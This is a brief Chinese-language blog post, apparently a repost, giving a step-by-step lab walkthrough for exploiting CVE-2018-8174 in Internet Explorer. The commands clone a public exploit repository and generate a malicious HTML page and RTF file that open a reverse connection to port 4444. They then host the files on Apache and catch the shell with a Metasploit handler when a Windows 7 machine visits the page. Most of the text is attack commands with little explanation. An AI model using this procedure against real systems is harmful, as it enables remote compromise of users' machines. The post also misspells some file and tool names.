其他分享
首页 > 其他分享> > 0day漏洞

0day漏洞

作者:互联网

 

 

 

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git     从github上下载文件

cd CVE-2018-8174_EXP.git     进入文件夹

 

 

 

 python CVE-2018-8174.py -u http://192.168.44.131/expolit.html -o hack.rtf -i 192.168.44.131 -p 4444

(-u 是攻击机的地址 -o生成一个文件 -i建立一个反弹链接 接口为4444)

 

 cp exploit.html /var/www/html(将exploit.html 复制到var/www/html)

systemctl start apache2(启动阿帕奇服务)

cp hack.rtf /var/www/html (将文件复制到路径中)

 

 接下来

启动msfconsole 模块

search handler找一下服务

使用命令,设置后台↓

show options(查看配置信息)

set lhost 192.168.44.131(设置下配置信息中的lhost)

 

 

 

 然后用win7访问目标的网站

 

访问阿帕奇默认网页下的刚刚的python生成的文件

 

网页闪退,但是攻击机得到了响应

在kail中输入run命令运行

 

 

 

 

 

标签:set,攻击机,0day,192.168,漏洞,地址,html,2018
来源: https://www.cnblogs.com/ouzhougou/p/16268825.html